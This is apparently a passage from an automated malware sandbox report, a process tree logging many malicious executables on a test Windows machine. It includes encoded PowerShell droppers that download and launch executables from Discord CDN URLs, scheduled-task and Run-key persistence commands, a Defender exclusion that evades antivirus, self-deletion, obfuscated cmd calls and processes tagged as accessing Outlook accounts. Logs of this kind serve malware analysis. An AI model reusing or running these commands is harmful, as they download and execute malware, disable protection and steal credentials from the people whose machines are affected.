C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAaAB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADgAMQA2ADEAMQA3ADMAMwAxADEAMwAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGMAYQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwBzAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB2AGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATQBOAFoAWABIAEEAMwA2AC4AZQB4AGUAJwApACkAPAAjAHUAdQBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAbgBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAG0AcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAE4AWgBYAEgAQQAzADYALgBlAHgAZQAnACkAPAAjAHQAdQBzACMAPgA="9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\MNZXHA36.exe"C:\Users\Admin\AppData\Roaming\MNZXHA36.exe"10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 80411⤵
- Program crash
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\4daUBDWNly.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\4daUBDWNly.exeC:\Users\Admin\AppData\Local\Temp\4daUBDWNly.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdgB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADUAOQA5ADcANwA3ADIANQA1ADUAMgA0AC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAdABxAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBtAGcAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAGoAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8ASQBYAEMAQgAzAC4AZQB4AGUAJwApACkAPAAjAHgAcQBnACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB2AGwAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8ASQBYAEMAQgAzAC4AZQB4AGUAJwApADwAIwB3AHEAZgAjAD4A"9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\POIXCB3.exe"C:\Users\Admin\AppData\Roaming\POIXCB3.exe"10⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\YiuliBraIW.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\YiuliBraIW.exeC:\Users\Admin\AppData\Local\Temp\YiuliBraIW.exe8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAZwBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADMAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYANQAwADAANQA0ADMANgA5ADIAOAAwAC8AaQBvAGQAaQBwAHAAYwBtAG0AbAAuAGUAeABlACcALAAgADwAIwBjAG0AagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHoAYgBhACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAZwBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEIAVgBOAE0AWABDAEcASABKADcALgBlAHgAZQAnACkAKQA8ACMAaQB1AGkAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbAB1AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHIAdwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEIAVgBOAE0AWABDAEcASABKADcALgBlAHgAZQAnACkAPAAjAGcAZAB1ACMAPgA="9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe"C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"11⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\fJLyuMh29f.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\fJLyuMh29f.exeC:\Users\Admin\AppData\Local\Temp\fJLyuMh29f.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYANQA5ADIAMQA4ADkAMgA3ADYANgA2AC8AVwBDAHIAbwBuAFMAZQBjAHUAcgBpAHQAeQBfAHAAcgBvAHQAZQBjAHQAZQBkAC4AZQB4AGUAJwAsACAAPAAjAGUAeQBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBtAHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBjAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUQBIAEcASgBBAFMARAAyADcALgBlAHgAZQAnACkAKQA8ACMAdwB4AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAegBpAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AdgBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFEASABHAEoAQQBTAEQAMgA3AC4AZQB4AGUAJwApADwAIwBmAHAAcAAjAD4A"9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\QHGJASD27.exe"C:\Users\Admin\AppData\Roaming\QHGJASD27.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \WindowsFilerar /tr "C:\Users\Admin\AppData\Roaming\WindowsFilerar\WindowsFilerar.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \WindowsFilerar /tr "C:\Users\Admin\AppData\Roaming\WindowsFilerar\WindowsFilerar.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f12⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsFilerar';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsFilerar' -Value '"C:\Users\Admin\AppData\Roaming\WindowsFilerar\WindowsFilerar.exe"' -PropertyType 'String'11⤵
- Adds Run key to start application
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd11⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\z4BWkjnInT.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\z4BWkjnInT.exeC:\Users\Admin\AppData\Local\Temp\z4BWkjnInT.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADcAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYANwA3ADYAOQA0ADgAMwA2ADgAMgA3AC8ARABlAGYAZQBuAGQAZQByAFMAYwByAGUAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAZwBqAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB0AGMAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHIAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAUwBKAEQAUwBBAEsARABRAC4AZQB4AGUAJwApACkAPAAjAGwAZwB3ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGMAcABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGIAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAUwBKAEQAUwBBAEsARABRAC4AZQB4AGUAJwApADwAIwBwAGsAaQAjAD4A"9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\LKSJDSAKDQ.exe"C:\Users\Admin\AppData\Roaming\LKSJDSAKDQ.exe"10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 80411⤵
- Program crash
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\RCAHrSufv7.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\RCAHrSufv7.exeC:\Users\Admin\AppData\Local\Temp\RCAHrSufv7.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAeQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADEAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYAOQA2ADMAMAA0ADkANwA1ADkAOQAyAC8AVwBpAG4AZABvAHcAcwBTAGgAZQBlAGwASABvAHMALgBlAHgAZQAnACwAIAA8ACMAawBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHAAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBwAGYAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAWABNAE4AWAA1ADUALgBlAHgAZQAnACkAKQA8ACMAdwBnAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYQByAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAYgBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwASwBYAE0ATgBYADUANQAuAGUAeABlACcAKQA8ACMAcwB6AGIAIwA+AA=="9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\LKXMNX55.exe"C:\Users\Admin\AppData\Roaming\LKXMNX55.exe"10⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\UPuzEwySUY.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\UPuzEwySUY.exeC:\Users\Admin\AppData\Local\Temp\UPuzEwySUY.exe8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAagB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADkAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADgAMQAwADUAOAA3ADEANgA0ADcAOAAyAC8AdwBJAE4AUgBBAFIALgBlAHgAZQAnACwAIAA8ACMAbQByAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAHMAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAGkAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAWABNAE4AQgBaAFgANQA1AC4AZQB4AGUAJwApACkAPAAjAHEAYwB5ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGgAcQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAHoAdQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAWABNAE4AQgBaAFgANQA1AC4AZQB4AGUAJwApADwAIwBqAGkAZwAjAD4A"9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\LKXMNBZX55.exe"C:\Users\Admin\AppData\Roaming\LKXMNBZX55.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd11⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd11⤵
-
C:\Users\Admin\Downloads\614.exe"C:\Users\Admin\Downloads\614.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "svhosts" /sc ONLOGON /tr "C:\Users\Admin\Downloads\614.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\subdir\svchosts.exe"C:\Users\Admin\AppData\Roaming\subdir\svchosts.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "svhosts" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\subdir\svchosts.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Downloads\8.exe"C:\Users\Admin\Downloads\8.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Downloads\norza.exe"C:\Users\Admin\Downloads\norza.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\xrfqtvbjh.exe"C:\Users\Admin\AppData\Local\Temp\xrfqtvbjh.exe" C:\Users\Admin\AppData\Local\Temp\xkoyijrfu.qub3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\xrfqtvbjh.exe"C:\Users\Admin\AppData\Local\Temp\xrfqtvbjh.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\Downloads\7.exe"C:\Users\Admin\Downloads\7.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- NTFS ADS
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe3⤵
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe3⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe"C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- NTFS ADS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ePnxkugSsfE.exe"3⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ePnxkugSsfE" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1CD8.tmp"3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe"C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\vvlpylntljvmqaumksedasijryuddvim"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\irwszoj"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\fxrz"4⤵
- Accesses Microsoft Outlook accounts
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\cgsjwvvsawjppvjamraresbjmoz"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\nixcxngtwebuzbxmvcmkoxwaudriri"4⤵
- Accesses Microsoft Outlook accounts
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\xdcnxgrnkmthbhtqmnzmrkqjdjbrstaaj"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\cgsjwvvsawjppvjamraresbjmoz"4⤵
- Registers COM server for autorun
- Drops file in Program Files directory
- Modifies registry class
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\eojpvqguazikadiegvmavcjqxigm"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\piwiwirvohawkjwixfhbgpdzgoyvgfsc"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\rkcs"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\rkcs"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\rkcs"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\piwiwirvohawkjwixfhbgpdzgoyvgfsc"4⤵
- Accesses Microsoft Outlook accounts
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\lrxktzwbxlwvyqoaiuiwgvcq"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\wudcushcluozjekerfupjiwhbnd"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\wudcushcluozjekerfupjiwhbnd"4⤵
- Accesses Microsoft Outlook accounts
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\goivukswzcgmlkyiiqhruvrqjtnata"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\goivukswzcgmlkyiiqhruvrqjtnata"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\wudcushcluozjekerfupjiwhbnd"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\edye"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\rzqpmevxzbm"4⤵
-
C:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exeC:\Users\Admin\Downloads\60E0G7UKRntM1TQ.exe /stext "C:\Users\Admin\AppData\Local\Temp\pxdxlmk"4⤵
- Accesses Microsoft Outlook accounts
-
C:\Users\Admin\Downloads\Miljoeministeren.exe"C:\Users\Admin\Downloads\Miljoeministeren.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x51^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4D^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x46^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x4F^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x30^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x31^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x39^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x40^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x71^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x62^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x77^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x66^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x45^3"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sET /a "0x6A^3"3⤵
-
